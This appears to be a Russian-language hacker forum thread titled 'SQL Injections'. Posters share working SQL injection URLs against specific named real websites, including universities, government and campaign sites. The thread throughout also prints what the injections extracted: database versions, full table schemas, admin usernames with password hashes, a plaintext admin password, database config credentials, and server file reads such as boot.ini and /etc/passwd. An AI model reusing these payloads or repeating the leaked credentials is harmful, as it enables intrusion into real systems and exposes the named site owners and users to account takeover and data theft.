SQL Инъекции

http://www.pneurom.ro/News.asp?NID=-3+or+1=@@version--


Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

 

http://www.michiganchannel.umich.edu/show.php?id=1289/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/LIMIT/**/1,1/*

Database Version: 4.1.22-community
Database name: michigantv2
User name: [email protected]

ишо edu!

 

_http://www.cnetnetworks.com/press/media.php?y=-1+union+select+*+from+mysql.information_schema+where+table_schema=cnetnetworks--
database - cnetnetworks
user - cnetadmin

 

toptestprep.com

Database Version: 5.0.75-community-log
Database name: miroadva_miro
User name: miroadva_miro@localhost

Code:

http://www.toptestprep.com/articles.php?id=-5+union+select+1,concat(user_login,0x3a,user_pass),3+from+wp_users

Code:

http://www.toptestprep.com/blog/wp-login.php

admin:miro1234

 

http://www.sacalaz.ro/evenimente_locale.php?pag=-2+union+select+1,2,concat_ws(0x3a,version(),database(),useR())


Database Version: 4.1.22-standard
Database name: domvisio_sacalaz
User name: domvisio_sacalaz@localhost

 

Code:

http://www.presidium.ru/catalog.php?cat=4&id=-1+union+select+conca t_ws(0x3a,version(),database(),user()),2--

Database Version : 5.0.26-Max
Database name : presidium
User name : mysql-user@localhost

admin :

Code:

http://www.presidium.ru/catalog.php?cat=4&id=-1+union+select+concat_ws(0x3a,user,password,file_priv),2+from +mysql.user--

file_priv Y

Code:

root:32638eb16b0c67ed

 

PR: 4
тИЦ: 60
kharkov-sport.com

Code:

http://www.kharkov-sport.com/news.phtml?id=731+and+null+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11/*

user():database():version()
kharkov_kharkovs@localhost:kharkov_kharkovsport:4.1.22-standard-log

 

PHP:

http://www.visitfelixstowe.co.uk/things_to_see_and_do_listing.php?cid=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,password,17,18,19,20,21,22,23,24,25,26+from+tbl_administrator+limit+1,1--

Dbname: web78-felixstowe
Version: 5.0.67-community
Username: web78-felixstowe@localhost

 

Code:

http://realty.stroycomplex.su/

ПР1
Тиц10
Version: 4.1.18-standard
Database: db_stroycomplex1
User: [email protected]

Code:

http://realty.stroycomplex.su/open.php?id=34324234%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

Да, давно я ничего не выкладывал, работа.. =))

 

http://www.otpdl.ro/Parlamentaritineri.html?par=-497+union+select+null,concat_ws(0x3a,version(),databasE(),useR()),null,null,null,null,null,null,null


Version : 4.1.22-standard
Database : otpdlro_otpdl
User : otpdlro_otpdl@localhost

 

тИЦ = 375
PageRank = 8

Database Version: 5.0.45-log
Database name: nig6
User name: [email protected]



База:

Code:

Database [nig6]
    Table [DigitalSignage  ( Rows)]
        DSID
        NetworkName
        IP
        Location
        timeChecked
        DateChecked
    Table [Digitisers  ( Rows)]
        DigitiserID
        NetworkName
        IP
        Location
    Table [Inventory_Categories  ( Rows)]
        Cat_ID
        Equip_Name
        Cat_Shortcode
        Cost
        PAT
        PAT_Type
        PAT_Interval
    Table [Inventory_Equipment  ( Rows)]
        Equip_ID
        Equipment_Type
        Make
        Model
        Serial_No
        Purchase_Date
        Supplier
        Location
    Table [Inventory_Manufacturers  ( Rows)]
        Manufacturer_ID
        Manufacturer_Name
    Table [Inventory_PAT_Types  ( Rows)]
        PAT_ID
        PAT_Type
    Table [Inventory_Suppliers  ( Rows)]
        Supplier_ID
        Supplier_Name
    Table [LectureRoomAccessibility  ( Rows)]
        AccessibilityID
        Accessibility
    Table [LectureRoomBookings  ( Rows)]
        BookingID
        Booking
    Table [LectureRoomBuildings  ( Rows)]
        BuildingID
        BuildingName
    Table [LectureRoomControl  ( Rows)]
        ControlID
        Control
    Table [LectureRoomFloors  ( Rows)]
        FloorID
        Floor
    Table [LectureRoomMicCollectionPoints  ( Rows)]
        MicID
        Location
    Table [LectureRoomType  ( Rows)]
        TypeID
        Type
    Table [LectureRoomsInfo  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
        Floor
        Accessibility
        Recap
        Bookings
        ControlSystem
        DataProjector
        DesktopPC
        DVDPlayer
        SlideProjector
        Visualiser
        OHP
        LaptopConnection
        PA
        LapelRadioMic
        FixedLecternMic
        HandheldRadioMic
        ProjectionScreen
        WritingSurface
        Userinstructions
        RoomInfo
        Telephone
        Image
        InductionLoop
        dateupdated
        datecreated
        DVDMultiregion
        LapelMicNo
        HandheldMicNo
        MicCollection
        RoomAvailable
        Furtherinfo
        Plasma
        projectormodel
        Displaywatch
        Netcam
        RadioMicFreq1
        RadioMicFreq2
        RadioMicFreq3
        RadioMicFreq4
        TelNo
        ProjPurchDate
        LampHours
        ProjSerialNo
        BLANK
        Projector
        DisplayWatch2
        AxisCam2
        DateChecked
        CheckedBy
    Table [Locations  ( Rows)]
        LocationID
        Location
    Table [NewPCData  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime
    Table [RoomStats  ( Rows)]
        TechID
        TechName
        NoChecked
    Table [backupnewpcdata  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
    Table [backuprooms  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
        Floor
        Accessibility
        Recap
        Bookings
        ControlSystem
        DataProjector
        DesktopPC
        DVDPlayer
        SlideProjector
        Visualiser
        OHP
        LaptopConnection
        PA
        LapelRadioMic
        FixedLecternMic
        HandheldRadioMic
        ProjectionScreen
        WritingSurface
        Userinstructions
        RoomInfo
        Telephone
        Image
        InductionLoop
        dateupdated
        datecreated
        DVDMultiregion
        LapelMicNo
        HandheldMicNo
        MicCollection
        RoomAvailable
        Furtherinfo
        Plasma
        projectormodel
        Displaywatch
        Netcam
        RadioMicFreq1
        RadioMicFreq2
        RadioMicFreq3
        RadioMicFreq4
        TelNo
        ProjPurchDate
        LampHours
        ProjSerialNo
        BLANK
        Projector
        DisplayWatch2
        AxisCam2
    Table [backuproomsnov  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
    Table [copyLocations  ( Rows)]
        LocationID
        Location
    Table [copynewPCData  ( Rows)]
        ID
        AssetTag
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
    Table [deletedpcs  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime
    Table [lampstock  ( Rows)]
        lampID
        lamp_code
        numberinstock
        numberonorder
        MaxHours
    Table [loanprojectors  ( Rows)]
        loanprojid
        projectormodel
        idcode
        purchasedate
    Table [projectors  ( Rows)]
        projectorID
        makeandmodel
        lamp_code
        instructions
    Table [testpcdata  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime

 

http://www.primariagrosi.ro/primaria-grosi_componenţa%20consiliului%20local-12+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9+limit+1,1.html



Database Version: 5.1.30
User name: grosi grosi@localhost
Database name: grosi grosi


таблички и колонки нормальным запросом не получилось, но и не заморачивался сильно.... substring

 

тИЦ = 325
PageRank = 8

Code:

http://www.bath.ac.uk/robots.txt

Database Version: 5.0.51b-log
Database name: CHAPLAINCY
User name: [email protected]


Пользователи:

3 : Tim Wakeling : tjw : fa2b488a77e9c067c5b66b7404943ebb
4 : Mother Sarah : mcs : 2cf11729b85d817ea9de30d9c0d90066
6 : Angela Berners-Wilson : adxab : 8e9b1d3d7b6445bc93dbd769de2fa511



База:

Code:

Database [CHAPLAINCY]
    Table [ann  ( Rows)]
        id
        startdate
        enddate
        announcement
    Table [churchareas  ( Rows)]
        areanumber
        areaname
        areadescription
    Table [churches  ( Rows)]
        id
        churchname
        denomination
        tradition
        churchaddress
        postcode
        area
        ministernames
        contactphone
        contactemail
        churchwebsite
        churchdescription
        servicedetails
        eveningservice
        busroutes
        nearsundaybus
        studentmembers
        otherinfo
    Table [faithsocs  ( Rows)]
        id
        name
        fullname
        description
        emailcontact1
        emailaddress1
        emailcontact2
        emailaddress2
        website
    Table [features  ( Rows)]
        id
        dateadded
        title
        descriptionfirst
        descriptionrest
        article
        author
        filename
    Table [help  ( Rows)]
        id
        sort
        title
        content
    Table [hometexts  ( Rows)]
        id
        setname
        welcometitle
        welcomemessage
        section1
        section2
        section3
        section4
        section5
        section6
        thought
        thoughtby
    Table [info  ( Rows)]
        id
        title
        description
        article
        filename
        invisible
    Table [links  ( Rows)]
        id
        title
        url
        description
        category
    Table [login  ( Rows)]
        id
        name
        username
        password
    Table [people  ( Rows)]
        id
        name
        filename
        role
        email
        website
        profile
    Table [photogalleries  ( Rows)]
        id
        dateadded
        datemodified
        galleryname
        galleryfilename
        gallerysize
        gallerydate
        description
        icon
    Table [photos  ( Rows)]
        id
        galleryid
        orderingallery
        caption
    Table [polls  ( Rows)]
        pollid
        dateposted
        question
        response1
        votesfor1
        response2
        votesfor2
        response3
        votesfor3
        response4
        votesfor4
        response5
        votesfor5
    Table [settings  ( Rows)]
        holiday
        pollsvisible
        eventsonhomepage
    Table [specialevents  ( Rows)]
        id
        startdate
        enddate
        starttime
        endtime
        title
        description
    Table [weeklyevents  ( Rows)]
        id
        day
        start
        end
        description
        allyear

PageRank = 5

Database Version: 5.0.18-nt
Database name: mac_admin
User name: root@localhost

root : *629F73D84581DE883641DF5DC165597AD9ED9D43



Читаем c:\Program Files\Apache Group\Apache2\conf\httpd.conf

Читаем c:\Program Files\Apache Group\Apache2\htdocs\section.html

И уже от них пляшем......

Database Version: 5.0.67-community
Database name: red2blac_cms
User name: red2blac_cms@localhost

Version:4.0.27-max-log
User:[email protected]
Database:db252263493

Version:4.1.22
User:con_user@localhost
Database:con001

 

Engage - the anti-racist campaign against antisemitism

Code:

http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3/*

user(): engage@localhost
database(): engageonline_org_uk
version(): 4.0.15

Code:

http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(log,0x3a,pass),3+from+users/*

hougo:ab4f63f9ac65152575886860dde480a1:azerty


www.engageonline.org.uk/blog/admin/

ЧиновникЪ.uapa.ru Официальный сайт Академии Госслужбы

Code:

http://chinovnik.uapa.ru/modern/issue.php?id=-13'+union+select+null,LOAD_FILE('c:/boot.ini'),null,null/*

PHP:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Advanced Server" /fastdetect C:\CMDCONS\BOOTSECT.DAT="Microsoft Windows 2000 Recovery Console" /cmdcons ' ()

user(): root@localhost
database(): chinovnik
version(): 5.0.27-community

PR=5

FILE_PRIV=Y
путь=C:\server\vhosts_uapa\chinovnik.uapa.ru\www\

дерзайте..

 

PR - 4

Version:5.0.18-standard-log
Database:sclou
User:terregen@localhost

*3585AAEF496B5FB4D4BE7C06B61EDB1FDA828703 : root

Version:4.1.20-log
User:msia@localhost
Database:msia

root : 7433abd2154c7925


PageRank = 6

Version:4.1.22
User:[email protected]
Database:aarda

 

Code:

http://www.cedema.org/ver.php?id=-1519+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--

4.1.22

 

2IP Показал 78 сайтов

Database Version: 4.1.22-standard-log
Database name: brit
User name: root@localhost

root : 1e775af3568b3992

Читаем etc/passwd

Читаем /etc/httpd/conf/httpd.conf

Читаем конфиг базы /var/www/html/bcm/settings.php

//database settings, variable names should explain themselves
$mysql_server = 'localhost'; //as in localhost
$mysql_username = ' root ';
$mysql_password = ' save406 ';
$mysql_database = ' brit ';
//

И впрёёёёддд.......

Database Version: 5.0.67-log
Database name: thedfi_data
User name: [email protected]

Наверное это Админчег

: shott : 38108a1210ec0f39 : : Shirley : Hott : 1

 

Code:

http://www.melnikov-tex.ru/

1

Version: 4.1.22
Database:
User:

Code:

http://www.melnikov-tex.ru/about/more.php?id=9991%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13%20from%20users--

Админка:
Логин: adm1285
Пользователь: 41d7e23b31063b763cbf6a1322e0cec5

 

Code:

http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),database(),user()),6,7,8,9,10,11--

Database Version : 5.0.67-log
Database name : u32942
User name : [email protected]

админы :

Code:

http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,passwo rd),6,7,8,9,10,11+from+ADMINS+limit+0,1--

Code:

kadry:d14b580f553ef88c15227a48d09db390
user:ee11cbb19052e40b07aac0ca060c23ee
margo:a31a83e3eb0bc30c5e373ae45b532622
Liqvidator-pdtpls:2f7db3cad1563fffbf526f6aadf2dfa1
bars:3dac72783f355eb5f7204a16e28581aa
fin:e1a63ee61e0d3423eb9b28d35c478d49
admin:98e2f8e1b90d4399dcd0dd4ad40cb2da
pro:4328908bba95a0fc6f6ad00e5e121871

 

todosurf.com

Code:

http://www.todosurf.com/noticias/ver.php?id=-334+union+select+1,2,3,4,5,6,7,8,9--

5.0.67-community-log
tables:

Code:

17:comentarios
18:contacto
19:encuesta
20:enlaces
21:estadisticas
22:fotos
23:noticias
24:puntuacion
25:usuarios
26:videos
27:webcams
28:webcams_visitas
29:zona_continente
30:zona_pais
31:zona_provincia
32:zona_spot